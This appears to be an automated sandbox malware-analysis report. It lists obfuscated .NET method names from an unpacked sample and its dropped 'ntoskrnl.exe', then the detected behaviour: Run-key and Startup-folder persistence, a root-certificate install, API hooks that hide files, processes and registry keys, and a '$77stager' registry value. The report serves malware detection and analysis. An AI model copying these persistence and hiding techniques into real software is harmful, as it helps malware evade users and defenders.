'_9NrUYW2N1UCvJFwXVkljmqrPmK0PyGZU8xAh'
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, WbZaHv4xuPSeZw2uAq4Js.csHigh entropy of concatenated method names: 'p1ZObOBDiiCdmpAHuZPCz', 'uKfwK6UHGlWnwlTxMuyZu', 'hTgbJvszj5Fn2Yyw4coaY', 'tEyVsPFLaQbs1Ms4fJWS2', 'LxcIxEh3wO4tfR6EFFwO7z97nFh4SjXFXVTYrnSSm1z1FiiWLY0c9yLV1WJZJDTiCQoO5jTAw3A293s81', 'Q7uLhPFA9x07ddwqXDvd9rqN2YsJqMOpj0NXCWUE0s6Bs7E3K2Eui4PN2a0uXX22DQuaV3AP2F43oPYwA', '_4OR978IwofAET9FeEwdugcsmibi1f3keYmqdsfnGQcQ93wtF4rS4QeySF930AiCg74qm3G77HPRLXWZEe', 'OnxXct0BLVJNUY42bfm3BlHNEzzVYn6W2V3GhtRhzP5LcciACAZEw75Iias6hEcYaq1gOAgxbmSdq1TVh', 'vfPucQzH31Aaj7pIXhk7iaCn3K9a5CctLzj39d2o7QgCsyIJ4WAe4i00U09H9DicnPzoeege2jtXVCYFC', '_8Bf9eZZmohMkIkrERgdVHYTqUPFJwRUUyPkaZMi84VgqQnNImGK58edVhnpkppTmI7oRV1FJVUXvSJtCz'
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, gbSyzXQhgHNZmmbfmM8GltxWX51PeZR1IbpV.csHigh entropy of concatenated method names: '_0Tn8eiUBotyOjBtK4ys8Uf813ry6LjWuikS0', 'C8ADOhQ3KeBvCXnKAjGv6J3XM7TCpsX4tVM2lsThPwpStVfgUL06JOfrYHd0wA5', 'PsdvIju2ypJ9PqqIWRqI9KvAnEXBoZmjOnRut1tXv2U4GnESElS3ewxafh4B1Di', '_3eYv3dv27en6o2hRGw5Nnr60o09PnZdx3R0p2DzYRlLZrEX6pr5ENSPxVNOv1ik', 'BCVkibtgWDAggWeWvVrNeQzByt9mUF3s46FIvB9nfQkeB5Dd9dzFXC4NcIdq4Pz'
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, An0DSGyo344mWvaOGRrvwB3xPQTerGsbqj4hWP87gE2xj6Xf861To.csHigh entropy of concatenated method names: 'vHFFmttLONVktUsWUA3AJGFdJWwH3LXW3xXjpw21bBBfogjdXwixL', 'pDig5htp97pCUFbUOWgCFQEhPPMCswUZeqO0OvckzS0LVMk2IbATt', '_3zX6h0rbxTkLHYQL5aUcLZHZ7UzQhII1RWwOwCq7kahd95MljO1Y8', 'qWQJ4sEDsHWDMdrXMBkWJJMAR2ZJYuHYUXWKncElQ', 'gq4Qkyfs4qJPW0ELlZ3kPt15qUZ0cxiBsFeAPeQI5', 'RFBbtf7HwHMb6tA0XzPhNh0zTs2JPusWSKjbkqzCH', 'Ggm60FFRlbFETKfaMX2uqzTwCAlOOfzdpr80PQzQt', 'SfbFF1YXwOThpiQCsrqLkaZcTWr8qgkCV0BH53CKx', 'o54yd07s4Ybrh2mMTQmPy9G13JW9ciIrO77zM8H2u', 'pnE5wwk6209HgsLniyDfSldBWArhFkd7jbxxWqdyQ'
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, g59OujVBB7MZJrqDCW5gf5pEZBK5CRLNy2qq.csHigh entropy of concatenated method names: 'Udog1cHZ1AZJdMqeZsOj2t0bHbbfTPyLXdZe', 'TTYQ8X2ipUHHOkpu8pFoVFvSsdMubt5OxO8w', 'HT2IJGVpP7zoCQKtrmw3udmHXeOWC8OpeL8N', 'M9quXEQLDHFgQdGrsqwRWJUMnoQCKJWjSr19mi7k424vOIRs8Fm0VrYwzEFpRaL', '_1R6sIwUFYAWIMc0rzfxjghWNfbNjvLbVc8IJBPCINsJKoQXG1mhyq3NKOhHPeSr', 'rDsj1OqcOyybEuCLD2FFi2BigjKCDFhW9PjBvEGOqBEnsU9SFadJtQkG7xaHR7X', 'qIJHJB3QXPOXWlGDcFiDAmtKitBmvx9A5fUf7AI0uqYmSXmbBJoJerF6poK7WhD', 'GHUFd804U76ooo0qpMgfZJtEwg6rVUVsmOdRDm6D4eJcy5wWm2iRwOzKSeaZU2v', 'HnLd5xAdbGZEMuhGUGFFabByTNuTI0ppEXue9G35Rm7RfXZT', 'Wbg4wkSPngGqJ8xephornvch2JT70vBDY2ex0FEFCEq8NqbS'
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, B9E2fnMLcC12guuhzPwoS77zgW1ZgEiELCEEKaw2Klq5.csHigh entropy of concatenated method names: 'nvIwktLoxcNX1Yoqnf7SQGBzq9bmI6sAxpElhIxlHTTf', 'WAB40fyGIXFhlujIcnNSF6ImInBnekudbmbqIGmAsaQw', 'kZ8CdUlCp9uvwjQ3Qbw7TWFHyuInWi0dQnSIix6anlMJaie9o45d4PFFYcqaBFiqYovX8AZKjN8V', 'RKBr7RPx5MBcrYIh4IgNXmAPocRcxQIkES4vegZIf1KcSH7FtVgMm7LCGj2zT2NxkMkCki6Wu42g', '_2r1fsEY49aYbWGhzoGwNPvx1xQHfdn8rwpgaNoXz0Tuwx8n9y3w3rfGvPwPBcoQOVdGokzb2Yyq3', 's5g5xnN65pkcCGULZ4wfhDYsp3th2DWLXvhEsmb3JX3mt5g4QxSEY0anSxtvAHY62UNFQHi0BqM7', '_4OPzvYsw9YIZjEk0ugcA2t02sl6ai564i56NGeOWtgK3Xtr8qAwUFsInykU1M6qA3oGUuKoAzkN0', 'IbOlDrDw4uKuYEJJ7oENUTQVkFnyEAdK2E0nTN4HJMXZvdnUqL6A7xGIi5ecKEQ5qrimIPMJJsmC', 'E1CYunwxKQKpCDj7UCg7Iop0sQjq8FSZVg8O0lpyuUDw8tgLwTI5T6Ubs3ehtnKDgbDsnsr7nIlr', 'COf9r32smfr6yi32UMkNpnw81JfdBdmdEcHppRVvIgTUxLItsohhP6bWoT7cTmmGPTaO3XuntYsy'
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, fBE1wflwwjJOP1BboN3oP.csHigh entropy of concatenated method names: 'YD0QCSyqPyrsjswITvyc0', 'F4ZGWRWk4BZtS1nHIrJoM', 'JV1vJlWqNGKTYu462VICF', 'Tsa3qapValzJx3jV7kJRC', 'PSDL1hLudsVOQbbVaV1Ou', '_5UkLRybGfm6953NTMwCch', 'iSkYSAOPrdhrNkZZh8yhq', 'XQ40cR7S4gZaA89F6Dlrf', 'SRFpPA3NOPbiTTzozqFUt', '_2rM7AGNhDvP80KL8aaGC5'
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, B6YyM3tn1GEMGxan0OhtCDItEFzdSbGF8hoT7DwPUwJukMpi4blkW7U7thwug6Kz0xrZfVtuOok9.csHigh entropy of concatenated method names: 'Y6S3kL36Hhi6Szxbaj5z8VUc7sfdv7uyv94sqgvyBeGZELv8NjXahMovEPMValZLRFmzxkbA5RYb', 'XMskKsZQ9xFCDyWv1SHyit5MgjJ9eXAPgl7rq9zocjRtYNs7ZTqJBnKwpZYk3Tjg7rv8gsTdiSz6', 'IuE5JWtWX7HFtcdEkmeLXOGSGvEac8otBZ8VrB7hcFItnfZyvxNUwrGatrgiV', 'J2dXMjGxtzHtGu95nwioA8GXiUZzxw9IVzHT6uy7a6wVG2Dv8y9nILQKtkvTH', '_5KTvCTOAK8L5ko8fjIS43bGsdndlEbKw5kbl98Nb1lZnB4duTz0K1I2LlX7sB', 'UeEZcneYsNnSeeAIZo1ffRvkfTugfxvXkoNUmaSKo7U7ifDU6066uKRT3r5h8', 'X5WDd7gjKzGrWNWDILbOkkcP8yF5HqxbM9XV4N2uuH2ZQkytMncHp8s8xMM05', '_9TqFNy41v0GiP4F1cETXtPtqFnfoEYCpQyaaD7SJ9TOVInQp5VgICBRYDRZrM', 'HQuHRHRNRfM6PqMn65cZcAsVxDrWU96TV7WGulbL7V1W4ipHP3qgvZ9igMx7t', 'rjP5LEPeLfi3iwoWJZhMhMHVIq2WMWMypmKPM64aivEKzGy5C7GgI3y3N3vPR'
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, n2VU5KGecv5aHTrU9Mb0Y.csHigh entropy of concatenated method names: 'tQTtE8TgSIaIHHMv1vHgk', 'poMSvK625dXjX4DLt1GoPxkDF4gmzUj1m2gXBXLja1YnsNXg2aGONjOlYMWJPU94pfzARuv5uUboODqA9', 'VkyPJkFmps3stXrDTV3HiuHEKbmdyK0Sdd02RIUBO8CnlaFkj2g41fkUgvR2Xr8IXfL3FBnNbsbpCSwQy', 'gTQLiUl5jHM6EM5h4OLGsbKAgcYt5k7y7EyfgXCpoOwwdGCnQJ5eqPF9ubElDaVgeC7sXmlQGvGaYlBA5', '_2pr1umXGVGVA4sjOu8o81mXfEsHV8SfL326eNWGWUpTQrDHtiE9LROmr75Xj46jyM4Y8A1BTekoVBhGCG'
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, iRivwccr5pOuk6KKkp3t6eiIuTgZTwKJ8CfW.csHigh entropy of concatenated method names: '_2cm4dcpEA29Z6snowz1i3MloVubUZygEkOvk', 'hjsXV3YkekSdVTRTKUgBkabyxqXUtATdRbAg', 'WEz5LK16Y9RN2LoTju2Vf2AvCuxMuijFZ8YJ', 'sjBFheflFg6hfHtLrQaGsQqQcSl9ASPJAW2K', 'Ek7zboftpByzlUVnF7y27HEcj9nQalRUglxd', 'mqrsPQD1SKmKewROMjcFcnJyOxgaUA5KLfD2', 'iJJyJXC3nry792reNxn1j', 'xzF7fJAqbsXP9Fxbb3FO6', 'Qc0feZTjFDxANHPoAdAwf', 'Da7RH067eSxE5WmxXlO3a'
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.csHigh entropy of concatenated method names: 'bZELyPv3sja3iEp6tfftvGVG1y3nZhWPyb4Yrb1ZrUWizO4DUyMVnkotU2D8KPtY645dXWVnGMgLOLlZ6VxKpNMAyewggN', 'ShBTJDYV4jRo7REWRW7Cr1jYv6C5FA7f2OU1EMoMQMNXmaxVLJoZvNOhSNYTOw3LCpoBLUvIGoswxzbB2QF4wbF77nAr7u', 'tdkTdJfS3CUjbu0zLiwC0OS0E2inThepfOryywwLmCKe6tVR5MtPJnk3lILmsCBcccyVPtD5SnoxRVyb89Ls0cvzS88htN', 'yhlg7wWe2xBtm0uQU4gO0padLD4ICYPpCGSKC2E0mqps610BIgpa3IqJRmwuF2zhCXFYDguhvqwlCcBLBI4N3UhMuqoFI3', '_9IbWxPrVmeYs17G1W7t9s5KsZohJc8RouvBX991UbIMDkl2cwdC2PnNBfJqBk0KmCiR5GdIHDXVhRdDCnpMYnOienu6VeO', '_8SXDO5zQtqSdvrNA62QJFzFSUpPW53hMpgMj1OgTIQfZmLQLgn0GGrrlyDxT5AVtuJE4sYTk0UZU2jsa7Fynpm6e6F17EX', 'mb359UbXwCtCUiRSgJSuNvZ8imfLN3qpjfOUsebZqacEQsV9owqeyAj6go0CZcHjBBbWtRiCLfzKB1lSIz8CzjuG6ZcwvR', 'sasNNjZ3RAo1mY0lB5QmByitrq1TFWRqxLV5', 'UI6Mvbuu37198ktvpls3iZmWuR4MY8VKuvvZ', '_9NrUYW2N1UCvJFwXVkljmqrPmK0PyGZU8xAh'
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, WbZaHv4xuPSeZw2uAq4Js.csHigh entropy of concatenated method names: 'p1ZObOBDiiCdmpAHuZPCz', 'uKfwK6UHGlWnwlTxMuyZu', 'hTgbJvszj5Fn2Yyw4coaY', 'tEyVsPFLaQbs1Ms4fJWS2', 'LxcIxEh3wO4tfR6EFFwO7z97nFh4SjXFXVTYrnSSm1z1FiiWLY0c9yLV1WJZJDTiCQoO5jTAw3A293s81', 'Q7uLhPFA9x07ddwqXDvd9rqN2YsJqMOpj0NXCWUE0s6Bs7E3K2Eui4PN2a0uXX22DQuaV3AP2F43oPYwA', '_4OR978IwofAET9FeEwdugcsmibi1f3keYmqdsfnGQcQ93wtF4rS4QeySF930AiCg74qm3G77HPRLXWZEe', 'OnxXct0BLVJNUY42bfm3BlHNEzzVYn6W2V3GhtRhzP5LcciACAZEw75Iias6hEcYaq1gOAgxbmSdq1TVh', 'vfPucQzH31Aaj7pIXhk7iaCn3K9a5CctLzj39d2o7QgCsyIJ4WAe4i00U09H9DicnPzoeege2jtXVCYFC', '_8Bf9eZZmohMkIkrERgdVHYTqUPFJwRUUyPkaZMi84VgqQnNImGK58edVhnpkppTmI7oRV1FJVUXvSJtCz'
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, gbSyzXQhgHNZmmbfmM8GltxWX51PeZR1IbpV.csHigh entropy of concatenated method names: '_0Tn8eiUBotyOjBtK4ys8Uf813ry6LjWuikS0', 'C8ADOhQ3KeBvCXnKAjGv6J3XM7TCpsX4tVM2lsThPwpStVfgUL06JOfrYHd0wA5', 'PsdvIju2ypJ9PqqIWRqI9KvAnEXBoZmjOnRut1tXv2U4GnESElS3ewxafh4B1Di', '_3eYv3dv27en6o2hRGw5Nnr60o09PnZdx3R0p2DzYRlLZrEX6pr5ENSPxVNOv1ik', 'BCVkibtgWDAggWeWvVrNeQzByt9mUF3s46FIvB9nfQkeB5Dd9dzFXC4NcIdq4Pz'
                              Source: ntoskrnl.exe.3.dr, An0DSGyo344mWvaOGRrvwB3xPQTerGsbqj4hWP87gE2xj6Xf861To.csHigh entropy of concatenated method names: 'vHFFmttLONVktUsWUA3AJGFdJWwH3LXW3xXjpw21bBBfogjdXwixL', 'pDig5htp97pCUFbUOWgCFQEhPPMCswUZeqO0OvckzS0LVMk2IbATt', '_3zX6h0rbxTkLHYQL5aUcLZHZ7UzQhII1RWwOwCq7kahd95MljO1Y8', 'qWQJ4sEDsHWDMdrXMBkWJJMAR2ZJYuHYUXWKncElQ', 'gq4Qkyfs4qJPW0ELlZ3kPt15qUZ0cxiBsFeAPeQI5', 'RFBbtf7HwHMb6tA0XzPhNh0zTs2JPusWSKjbkqzCH', 'Ggm60FFRlbFETKfaMX2uqzTwCAlOOfzdpr80PQzQt', 'SfbFF1YXwOThpiQCsrqLkaZcTWr8qgkCV0BH53CKx', 'o54yd07s4Ybrh2mMTQmPy9G13JW9ciIrO77zM8H2u', 'pnE5wwk6209HgsLniyDfSldBWArhFkd7jbxxWqdyQ'
                              Source: ntoskrnl.exe.3.dr, g59OujVBB7MZJrqDCW5gf5pEZBK5CRLNy2qq.csHigh entropy of concatenated method names: 'Udog1cHZ1AZJdMqeZsOj2t0bHbbfTPyLXdZe', 'TTYQ8X2ipUHHOkpu8pFoVFvSsdMubt5OxO8w', 'HT2IJGVpP7zoCQKtrmw3udmHXeOWC8OpeL8N', 'M9quXEQLDHFgQdGrsqwRWJUMnoQCKJWjSr19mi7k424vOIRs8Fm0VrYwzEFpRaL', '_1R6sIwUFYAWIMc0rzfxjghWNfbNjvLbVc8IJBPCINsJKoQXG1mhyq3NKOhHPeSr', 'rDsj1OqcOyybEuCLD2FFi2BigjKCDFhW9PjBvEGOqBEnsU9SFadJtQkG7xaHR7X', 'qIJHJB3QXPOXWlGDcFiDAmtKitBmvx9A5fUf7AI0uqYmSXmbBJoJerF6poK7WhD', 'GHUFd804U76ooo0qpMgfZJtEwg6rVUVsmOdRDm6D4eJcy5wWm2iRwOzKSeaZU2v', 'HnLd5xAdbGZEMuhGUGFFabByTNuTI0ppEXue9G35Rm7RfXZT', 'Wbg4wkSPngGqJ8xephornvch2JT70vBDY2ex0FEFCEq8NqbS'
                              Source: ntoskrnl.exe.3.dr, B9E2fnMLcC12guuhzPwoS77zgW1ZgEiELCEEKaw2Klq5.csHigh entropy of concatenated method names: 'nvIwktLoxcNX1Yoqnf7SQGBzq9bmI6sAxpElhIxlHTTf', 'WAB40fyGIXFhlujIcnNSF6ImInBnekudbmbqIGmAsaQw', 'kZ8CdUlCp9uvwjQ3Qbw7TWFHyuInWi0dQnSIix6anlMJaie9o45d4PFFYcqaBFiqYovX8AZKjN8V', 'RKBr7RPx5MBcrYIh4IgNXmAPocRcxQIkES4vegZIf1KcSH7FtVgMm7LCGj2zT2NxkMkCki6Wu42g', '_2r1fsEY49aYbWGhzoGwNPvx1xQHfdn8rwpgaNoXz0Tuwx8n9y3w3rfGvPwPBcoQOVdGokzb2Yyq3', 's5g5xnN65pkcCGULZ4wfhDYsp3th2DWLXvhEsmb3JX3mt5g4QxSEY0anSxtvAHY62UNFQHi0BqM7', '_4OPzvYsw9YIZjEk0ugcA2t02sl6ai564i56NGeOWtgK3Xtr8qAwUFsInykU1M6qA3oGUuKoAzkN0', 'IbOlDrDw4uKuYEJJ7oENUTQVkFnyEAdK2E0nTN4HJMXZvdnUqL6A7xGIi5ecKEQ5qrimIPMJJsmC', 'E1CYunwxKQKpCDj7UCg7Iop0sQjq8FSZVg8O0lpyuUDw8tgLwTI5T6Ubs3ehtnKDgbDsnsr7nIlr', 'COf9r32smfr6yi32UMkNpnw81JfdBdmdEcHppRVvIgTUxLItsohhP6bWoT7cTmmGPTaO3XuntYsy'
                              Source: ntoskrnl.exe.3.dr, fBE1wflwwjJOP1BboN3oP.csHigh entropy of concatenated method names: 'YD0QCSyqPyrsjswITvyc0', 'F4ZGWRWk4BZtS1nHIrJoM', 'JV1vJlWqNGKTYu462VICF', 'Tsa3qapValzJx3jV7kJRC', 'PSDL1hLudsVOQbbVaV1Ou', '_5UkLRybGfm6953NTMwCch', 'iSkYSAOPrdhrNkZZh8yhq', 'XQ40cR7S4gZaA89F6Dlrf', 'SRFpPA3NOPbiTTzozqFUt', '_2rM7AGNhDvP80KL8aaGC5'
                              Source: ntoskrnl.exe.3.dr, B6YyM3tn1GEMGxan0OhtCDItEFzdSbGF8hoT7DwPUwJukMpi4blkW7U7thwug6Kz0xrZfVtuOok9.csHigh entropy of concatenated method names: 'Y6S3kL36Hhi6Szxbaj5z8VUc7sfdv7uyv94sqgvyBeGZELv8NjXahMovEPMValZLRFmzxkbA5RYb', 'XMskKsZQ9xFCDyWv1SHyit5MgjJ9eXAPgl7rq9zocjRtYNs7ZTqJBnKwpZYk3Tjg7rv8gsTdiSz6', 'IuE5JWtWX7HFtcdEkmeLXOGSGvEac8otBZ8VrB7hcFItnfZyvxNUwrGatrgiV', 'J2dXMjGxtzHtGu95nwioA8GXiUZzxw9IVzHT6uy7a6wVG2Dv8y9nILQKtkvTH', '_5KTvCTOAK8L5ko8fjIS43bGsdndlEbKw5kbl98Nb1lZnB4duTz0K1I2LlX7sB', 'UeEZcneYsNnSeeAIZo1ffRvkfTugfxvXkoNUmaSKo7U7ifDU6066uKRT3r5h8', 'X5WDd7gjKzGrWNWDILbOkkcP8yF5HqxbM9XV4N2uuH2ZQkytMncHp8s8xMM05', '_9TqFNy41v0GiP4F1cETXtPtqFnfoEYCpQyaaD7SJ9TOVInQp5VgICBRYDRZrM', 'HQuHRHRNRfM6PqMn65cZcAsVxDrWU96TV7WGulbL7V1W4ipHP3qgvZ9igMx7t', 'rjP5LEPeLfi3iwoWJZhMhMHVIq2WMWMypmKPM64aivEKzGy5C7GgI3y3N3vPR'
                              Source: ntoskrnl.exe.3.dr, n2VU5KGecv5aHTrU9Mb0Y.csHigh entropy of concatenated method names: 'tQTtE8TgSIaIHHMv1vHgk', 'poMSvK625dXjX4DLt1GoPxkDF4gmzUj1m2gXBXLja1YnsNXg2aGONjOlYMWJPU94pfzARuv5uUboODqA9', 'VkyPJkFmps3stXrDTV3HiuHEKbmdyK0Sdd02RIUBO8CnlaFkj2g41fkUgvR2Xr8IXfL3FBnNbsbpCSwQy', 'gTQLiUl5jHM6EM5h4OLGsbKAgcYt5k7y7EyfgXCpoOwwdGCnQJ5eqPF9ubElDaVgeC7sXmlQGvGaYlBA5', '_2pr1umXGVGVA4sjOu8o81mXfEsHV8SfL326eNWGWUpTQrDHtiE9LROmr75Xj46jyM4Y8A1BTekoVBhGCG'
                              Source: ntoskrnl.exe.3.dr, iRivwccr5pOuk6KKkp3t6eiIuTgZTwKJ8CfW.csHigh entropy of concatenated method names: '_2cm4dcpEA29Z6snowz1i3MloVubUZygEkOvk', 'hjsXV3YkekSdVTRTKUgBkabyxqXUtATdRbAg', 'WEz5LK16Y9RN2LoTju2Vf2AvCuxMuijFZ8YJ', 'sjBFheflFg6hfHtLrQaGsQqQcSl9ASPJAW2K', 'Ek7zboftpByzlUVnF7y27HEcj9nQalRUglxd', 'mqrsPQD1SKmKewROMjcFcnJyOxgaUA5KLfD2', 'iJJyJXC3nry792reNxn1j', 'xzF7fJAqbsXP9Fxbb3FO6', 'Qc0feZTjFDxANHPoAdAwf', 'Da7RH067eSxE5WmxXlO3a'
                              Source: ntoskrnl.exe.3.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.csHigh entropy of concatenated method names: 'bZELyPv3sja3iEp6tfftvGVG1y3nZhWPyb4Yrb1ZrUWizO4DUyMVnkotU2D8KPtY645dXWVnGMgLOLlZ6VxKpNMAyewggN', 'ShBTJDYV4jRo7REWRW7Cr1jYv6C5FA7f2OU1EMoMQMNXmaxVLJoZvNOhSNYTOw3LCpoBLUvIGoswxzbB2QF4wbF77nAr7u', 'tdkTdJfS3CUjbu0zLiwC0OS0E2inThepfOryywwLmCKe6tVR5MtPJnk3lILmsCBcccyVPtD5SnoxRVyb89Ls0cvzS88htN', 'yhlg7wWe2xBtm0uQU4gO0padLD4ICYPpCGSKC2E0mqps610BIgpa3IqJRmwuF2zhCXFYDguhvqwlCcBLBI4N3UhMuqoFI3', '_9IbWxPrVmeYs17G1W7t9s5KsZohJc8RouvBX991UbIMDkl2cwdC2PnNBfJqBk0KmCiR5GdIHDXVhRdDCnpMYnOienu6VeO', '_8SXDO5zQtqSdvrNA62QJFzFSUpPW53hMpgMj1OgTIQfZmLQLgn0GGrrlyDxT5AVtuJE4sYTk0UZU2jsa7Fynpm6e6F17EX', 'mb359UbXwCtCUiRSgJSuNvZ8imfLN3qpjfOUsebZqacEQsV9owqeyAj6go0CZcHjBBbWtRiCLfzKB1lSIz8CzjuG6ZcwvR', 'sasNNjZ3RAo1mY0lB5QmByitrq1TFWRqxLV5', 'UI6Mvbuu37198ktvpls3iZmWuR4MY8VKuvvZ', '_9NrUYW2N1UCvJFwXVkljmqrPmK0PyGZU8xAh'
                              Source: ntoskrnl.exe.3.dr, WbZaHv4xuPSeZw2uAq4Js.csHigh entropy of concatenated method names: 'p1ZObOBDiiCdmpAHuZPCz', 'uKfwK6UHGlWnwlTxMuyZu', 'hTgbJvszj5Fn2Yyw4coaY', 'tEyVsPFLaQbs1Ms4fJWS2', 'LxcIxEh3wO4tfR6EFFwO7z97nFh4SjXFXVTYrnSSm1z1FiiWLY0c9yLV1WJZJDTiCQoO5jTAw3A293s81', 'Q7uLhPFA9x07ddwqXDvd9rqN2YsJqMOpj0NXCWUE0s6Bs7E3K2Eui4PN2a0uXX22DQuaV3AP2F43oPYwA', '_4OR978IwofAET9FeEwdugcsmibi1f3keYmqdsfnGQcQ93wtF4rS4QeySF930AiCg74qm3G77HPRLXWZEe', 'OnxXct0BLVJNUY42bfm3BlHNEzzVYn6W2V3GhtRhzP5LcciACAZEw75Iias6hEcYaq1gOAgxbmSdq1TVh', 'vfPucQzH31Aaj7pIXhk7iaCn3K9a5CctLzj39d2o7QgCsyIJ4WAe4i00U09H9DicnPzoeege2jtXVCYFC', '_8Bf9eZZmohMkIkrERgdVHYTqUPFJwRUUyPkaZMi84VgqQnNImGK58edVhnpkppTmI7oRV1FJVUXvSJtCz'
                              Source: ntoskrnl.exe.3.dr, gbSyzXQhgHNZmmbfmM8GltxWX51PeZR1IbpV.csHigh entropy of concatenated method names: '_0Tn8eiUBotyOjBtK4ys8Uf813ry6LjWuikS0', 'C8ADOhQ3KeBvCXnKAjGv6J3XM7TCpsX4tVM2lsThPwpStVfgUL06JOfrYHd0wA5', 'PsdvIju2ypJ9PqqIWRqI9KvAnEXBoZmjOnRut1tXv2U4GnESElS3ewxafh4B1Di', '_3eYv3dv27en6o2hRGw5Nnr60o09PnZdx3R0p2DzYRlLZrEX6pr5ENSPxVNOv1ik', 'BCVkibtgWDAggWeWvVrNeQzByt9mUF3s46FIvB9nfQkeB5Dd9dzFXC4NcIdq4Pz'

                              Persistence and Installation Behavior

                              barindex
                              Creates files in the system32 config directory
                              Source: C:\Windows\System32\lsass.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
                              Installs new ROOT certificates
                              Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                              Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                              Source: C:\ProgramData\KrnlSetupSus.exeFile created: C:\ProgramData\ntoskrnl.exeJump to dropped file
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeFile created: C:\ProgramData\KrnlSetupSus.exeJump to dropped file
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeFile created: C:\ProgramData\Install.exeJump to dropped file
                              Source: C:\ProgramData\KrnlSetupSus.exeFile created: C:\ProgramData\ntoskrnl.exeJump to dropped file
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeFile created: C:\ProgramData\KrnlSetupSus.exeJump to dropped file
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeFile created: C:\ProgramData\Install.exeJump to dropped file
                              Source: C:\ProgramData\KrnlSetupSus.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnkJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnkJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ntoskrnlJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ntoskrnlJump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Hooks files or directories query functions (used to hide files and directories)
                              Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
                              Hooks processes query functions (used to hide processes)
                              Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
                              Hooks registry keys query functions (used to hide registry keys)
                              Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
                              Loading BitLocker PowerShell Module
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Modifies the prolog of user mode functions (user mode inline hooks)
                              Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                              Source: C:\ProgramData\Install.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $77stagerJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
